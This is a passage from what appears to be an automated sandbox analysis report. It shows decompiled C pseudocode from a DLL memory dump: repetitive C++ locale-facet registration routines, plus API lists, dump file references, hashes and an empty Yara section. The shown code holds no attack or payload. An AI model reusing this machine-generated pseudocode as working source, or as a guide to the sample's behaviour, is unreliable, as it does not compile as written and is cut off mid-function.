				_t140 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6E1C66BA(_t418 - 0x14);
					return E6E1E0075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6E1D12B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t418 - 0x20);
							E6E1E3D74(_t418 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t389, _t399, 0x14);
							E6E1C6653(_t418 - 0x14, 0);
							_t400 =  *0x6e286dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6E1A161C(0x6e286d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6E1C66BA(_t418 - 0x14);
								return E6E1E0075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6E1D1339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t418 - 0x20);
										E6E1E3D74(_t418 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t296, _t390, _t400, 0x14);
										E6E1C6653(_t418 - 0x14, 0);
										_t401 =  *0x6e286db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6E1A161C(0x6e286d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6E1C66BA(_t418 - 0x14);
											return E6E1E0075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6E1D13A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t418 - 0x20);
													E6E1E3D74(_t418 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t296, _t391, _t401, 0x14);
													E6E1C6653(_t418 - 0x14, 0);
													_t402 =  *0x6e286ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6E1A161C(0x6e286d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6E1C66BA(_t418 - 0x14);
														return E6E1E0075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6E1D1409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t418 - 0x20);
																E6E1E3D74(_t418 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t296, _t392, _t402, 0x14);
																E6E1C6653(_t418 - 0x14, 0);
																_t403 =  *0x6e286de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6E1A161C(0x6e286d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6E1C66BA(_t418 - 0x14);
																	return E6E1E0075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6E1D1471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t418 - 0x20);
																			E6E1E3D74(_t418 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t296, _t393, _t403, 0x14);
																			E6E1C6653(_t418 - 0x14, 0);
																			_t404 =  *0x6e286dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6E1A161C(0x6e286da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6E1C66BA(_t418 - 0x14);
																				return E6E1E0075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6E1D14EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t418 - 0x20);
																						E6E1E3D74(_t418 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t296, _t394, _t404, 0x14);
																						E6E1C6653(_t418 - 0x14, 0);
																						_t405 =  *0x6e286dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6E1A161C(0x6e286d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6E1C66BA(_t418 - 0x14);
																							return E6E1E0075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6E1D1558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t418 - 0x20);
																									E6E1E3D74(_t418 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t296, _t395, _t405, 0x14);
																									E6E1C6653(_t418 - 0x14, 0);
																									_t406 =  *0x6e286e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6E1A161C(0x6e286dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6E1C66BA(_t418 - 0x14);
																										return E6E1E0075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6E1D15C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t418 - 0x20);
																												E6E1E3D74(_t418 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t296, _t396, _t406, 0x14);
																												E6E1C6653(_t418 - 0x14, 0);
																												_t407 =  *0x6e286dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6E1A161C(0x6e286d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6E1C66BA(_t418 - 0x14);
																													return E6E1E0075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6E1D162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6E1A1438(_t359);
																															E6E1E3D74(_t418 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e22851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6e22c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6E1D542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6E1E0075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6E1C6FD3(__eflags, _t397);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6e286dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6E1C6FD3(__eflags, _t396);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6e286e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6E1C6FD3(__eflags, _t395);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6e286dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6E1C6FD3(__eflags, _t394);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6e286dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6E1C6FD3(__eflags, _t393);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6e286de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6E1C6FD3(__eflags, _t392);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6e286ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6E1C6FD3(__eflags, _t391);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6e286db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6E1C6FD3(__eflags, _t390);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6e286dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6E1C6FD3(__eflags, _t389);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6e286dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF760
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF76A
int.LIBCPMT ref: 6E1CF781

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF7A4
std::_Facet_Register.LIBCPMT ref: 6E1CF7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF7F9

Strings

xm(n, xrefs: 6E1CF775

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xm(n
API String ID: 113178234-949480937
Opcode ID: 402847a1e9ed1d0c857b2baa75abcd8af59b19cabba817b3e27ac913431e4983
Instruction ID: d94fd50739fe89a310836dca245b10711a3dca4ea934786211f9f8c8e8c259c0
Opcode Fuzzy Hash: 402847a1e9ed1d0c857b2baa75abcd8af59b19cabba817b3e27ac913431e4983
Instruction Fuzzy Hash: 64110A7591061D8BCF01DBD4C854AFDB7BAAF64B14F240909D520E73D0DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t770 - 0x14, 0);
				_t735 =  *0x6e286db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6E1A161C(0x6e286d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6E1C66BA(_t770 - 0x14);
					return E6E1E0075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6E1D0F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t770 - 0x20);
							E6E1E3D74(_t770 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t717, _t735, 0x14);
							E6E1C6653(_t770 - 0x14, 0);
							_t736 =  *0x6e286dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6E1A161C(0x6e286d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6E1C66BA(_t770 - 0x14);
								return E6E1E0075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6E1D0F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t770 - 0x20);
										E6E1E3D74(_t770 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t544, _t718, _t736, 0x14);
										E6E1C6653(_t770 - 0x14, 0);
										_t737 =  *0x6e286dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6E1A161C(0x6e286d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6E1C66BA(_t770 - 0x14);
											return E6E1E0075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6E1D0FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t770 - 0x20);
													E6E1E3D74(_t770 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t544, _t719, _t737, 0x14);
													E6E1C6653(_t770 - 0x14, 0);
													_t738 =  *0x6e286df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6E1A161C(0x6e286d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6E1C66BA(_t770 - 0x14);
														return E6E1E0075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6E1D1057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t770 - 0x20);
																E6E1E3D74(_t770 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t544, _t720, _t738, 0x14);
																E6E1C6653(_t770 - 0x14, 0);
																_t739 =  *0x6e286dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6E1A161C(0x6e286d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6E1C66BA(_t770 - 0x14);
																	return E6E1E0075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6E1D10BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t770 - 0x20);
																			E6E1E3D74(_t770 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t544, _t721, _t739, 0x14);
																			E6E1C6653(_t770 - 0x14, 0);
																			_t740 =  *0x6e286df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6E1A161C(0x6e286da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6E1C66BA(_t770 - 0x14);
																				return E6E1E0075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6E1D1127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t770 - 0x20);
																						E6E1E3D74(_t770 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t544, _t722, _t740, 0x14);
																						E6E1C6653(_t770 - 0x14, 0);
																						_t741 =  *0x6e286df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6E1A161C(0x6e286da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6E1C66BA(_t770 - 0x14);
																							return E6E1E0075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6E1D11AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t770 - 0x20);
																									E6E1E3D74(_t770 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t544, _t723, _t741, 0x14);
																									E6E1C6653(_t770 - 0x14, 0);
																									_t742 =  *0x6e286dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6E1A161C(0x6e286d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6E1C66BA(_t770 - 0x14);
																										return E6E1E0075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6E1D1230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t770 - 0x20);
																												E6E1E3D74(_t770 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t544, _t724, _t742, 0x14);
																												E6E1C6653(_t770 - 0x14, 0);
																												_t743 =  *0x6e286dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6E1A161C(0x6e286d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6E1C66BA(_t770 - 0x14);
																													return E6E1E0075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6E1D12B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t770 - 0x20);
																															E6E1E3D74(_t770 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t544, _t725, _t743, 0x14);
																															E6E1C6653(_t770 - 0x14, 0);
																															_t744 =  *0x6e286dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6E1A161C(0x6e286d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6E1C66BA(_t770 - 0x14);
																																return E6E1E0075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6E1D1339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t770 - 0x20);
																																		E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t544, _t726, _t744, 0x14);
																																		E6E1C6653(_t770 - 0x14, 0);
																																		_t745 =  *0x6e286db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6E1A161C(0x6e286d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6E1C66BA(_t770 - 0x14);
																																			return E6E1E0075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6E1D13A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t770 - 0x20);
																																					E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t544, _t727, _t745, 0x14);
																																					E6E1C6653(_t770 - 0x14, 0);
																																					_t746 =  *0x6e286ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6E1A161C(0x6e286d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6E1C66BA(_t770 - 0x14);
																																						return E6E1E0075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6E1D1409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t770 - 0x20);
																																								E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t544, _t728, _t746, 0x14);
																																								E6E1C6653(_t770 - 0x14, 0);
																																								_t747 =  *0x6e286de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6E1A161C(0x6e286d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6E1C66BA(_t770 - 0x14);
																																									return E6E1E0075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6E1D1471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t770 - 0x20);
																																											E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t544, _t729, _t747, 0x14);
																																											E6E1C6653(_t770 - 0x14, 0);
																																											_t748 =  *0x6e286dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6E1A161C(0x6e286da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6E1C66BA(_t770 - 0x14);
																																												return E6E1E0075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6E1D14EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t770 - 0x20);
																																														E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t544, _t730, _t748, 0x14);
																																														E6E1C6653(_t770 - 0x14, 0);
																																														_t749 =  *0x6e286dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6E1A161C(0x6e286d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
